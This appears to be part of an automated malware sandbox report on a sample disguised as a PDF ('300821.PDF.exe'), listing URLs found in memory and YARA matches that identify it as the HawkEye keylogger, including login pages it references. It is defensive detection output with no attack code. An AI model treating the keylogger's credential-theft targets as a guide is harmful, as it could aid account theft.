                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS7Tsy61sPGCiV6yILYtCYyP2q9i9bHmXBPqktk0xQvTH0l
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS9bnSRFZj9kLnT0CeZ7r27C9IrO3sFLnQL62gz&s=0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSHEjIxVJou5NRecC2n_FnHaUJDfppR3IDOglu2Ry9INoxt
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSKx7_Dt9K5OFgp-raiLw2XdVNOTbR27N_DCL6T8VDVN_16
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSTkM_f5rN2hSSg3E_UshkUpgZ0a66Lz0rF6gF6&s=0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcScI5035wSfgyvpN8fX27BnFHfF4a7I8z7Xlm7v&s=0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSpNsTsg--kCoAxXjTvRrABIfJjd5ITzVx14ODQUC4wDGzB
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSrCEL2r-B2oHHnS0EeiVjQLJYayeF4GHjCZod9vr4&s
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSvX77JsybkskW6WoLj5kY6exJKuOkXoRWSsNgJbFY&s
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT9-gm37CbSVQ1QMRdyqOvdY12lHBO7fXpaqZZqKP2Wbjr2
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTKoe8A2_V1bWtOlP5fx10ZdjsJZv6l2_sKjTp6jVAPnp0g
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcThUknsbAksExwESRgK7TW5ujPLzgeGDT0-A3f5a1XrdyR-
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTo0t2j428kWHZlc2etqXbsI-zLrpgSp87E2H24&s=0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v14/4UabrENHsxJlGDuGo1OIlLU94YtzCwA.woff
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc-.woff
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmSU5fBBc-.woff
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfBBc-.woff
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxM.woff
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNQXwBwQrE_SUsnWzwpadcOOdc8yOg6JxthQN
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNTXuGHPo1zFjYPXt7mTG-4GALGGk8bjqjvBm
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNQP1yCl9r5iywZTFTjpazv-DURVxDidzMfrF
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNSrZsXAj6n_sYvivJecwrpYgMhb9ihVGAlz2
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://lh5.googleusercontent.com/p/AF1QipOcdIDtTfqJElTfRhjdFP9dPcYlW61iEhrydiuX=w92-h92-n-k-no
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/ConvergedLoginPaginatedStrings.en.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/ConvergedLogin_PCore.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/Converged_v21033.css
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
                      Source: vbc.exe, 00000008.00000003.690799803.000000000220A000.00000004.00000001.sdmp, bhvE2B1.tmp.8.drString found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
                      Source: vbc.exe, 00000008.00000003.691419672.00000000027C5000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callouthttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2019-06-26-21-10-17/PreSignInSettingsConfig.json
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2019-06-26-21-10-17/PreSignInSettingsConfig.json?One
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json?One
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/19.086.0502.0006/OneDriveSetup.exe
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/19.103.0527.0003/update1.xml?OneDriveUpdate=d580ab8fe35aabd7f368aa
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update1.xml?OneDriveUpdate=285df6c9c501a160c7a24c
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update1.xml?OneDriveUpdate=4a941ab240f8b2c5ca3ca1
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://pki.goog/repository/0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=28e3747a031f4b2a8498142b7c961529&c=MSN&d=http%3A%2F%2Fwww.msn
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://ssl.gstatic.com/gb/images/i1_1967ca6a.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google-analytics.com/analytics.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=993498051.1601450642
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/?gws_rd=ssl
                      Source: vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/async/bgasy?ei=gTJ0X7zPLY2f1fAPlo2xoAI&yv=3&async=_fmt:jspb
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&pq
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&ps
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/complete/search?q=c&cp=1&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/complete/search?q=ch&cp=2&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/complete/search?q=chr&cp=3&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/complete/search?q=chro&cp=4&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/complete/search?q=chrom&cp=5&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuse
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/complete/search?q=chrome&cp=6&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authus
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/favicon.ico
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/images/hpp/Chrome_Owned_96x96.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/images/icons/material/system/1x/email_grey600_24dp.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/images/nav_logo299.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/images/phd/px.gif
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/images/searchbox/desktop_searchbox_sprites302_hr.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/application/x-msdownloadC:
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/js/bg/4sIGg4Q0MrxdMwjTwsyJBGUAZbljSmH8-8Fa9_hVOC0.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/search
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
                      Source: vbc.exe, 00000008.00000003.691264429.00000000021F5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/searchp/LinkId=255141
                      Source: vbc.exe, 00000008.00000003.690799803.000000000220A000.00000004.00000001.sdmp, bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/am=AAAAAABA
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/m=IvlUe
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.ConsentUi.en_GB.wmTUy5P6FUM.es5.O/ck=
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.bMYZ6MazNlM.
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/ac/cb/cb_cbu_kickin.svg
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/1x/googlelogo_color_92x36dp.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/check_black_24dp.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/keyboard_arrow_down_grey600_24dp.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/kpui/social/fb_32x32.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/kpui/social/twitter_32x32.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.og2.en_US.vA2d_upwXfg.O/rt=j/m=def
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.LGkrjG2a9yI.O/rt=j/m=qabr
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.CniBF78B8Ew.L.X.O/m=qcwid/excm=qaaw
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: https://www.gstatic.com/ui/v1/activityindicator/loading_24.gif
                      Source: vbc.exe, 00000008.00000003.691619174.00000000021F5000.00000004.00000001.sdmp, bhvE2B1.tmp.8.drString found in binary or memory: https://www.msn.com/
                      Source: vbc.exe, 00000008.00000003.691593547.00000000021F5000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com//searchp/LinkId=255141
                      Source: vbc.exe, 00000008.00000003.692044684.00000000027C8000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/http://www.google.com/ms-appx-web://microsoft.microsoftedge/ms-appx-web://micros
                      Source: vbc.exe, 00000008.00000003.692106678.00000000021FA000.00000004.00000001.sdmp, bhvE2B1.tmp.8.drString found in binary or memory: https://www.msn.com/spartan/dhp?locale=en-US&market=US&enableregulatorypsm=0&enablecpsm=0&ishostisol
                      Source: unknownDNS traffic detected: queries for: 240.163.3.0.in-addr.arpa

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected HawkEye KeyloggerShow sources
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.2b8b210.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPE
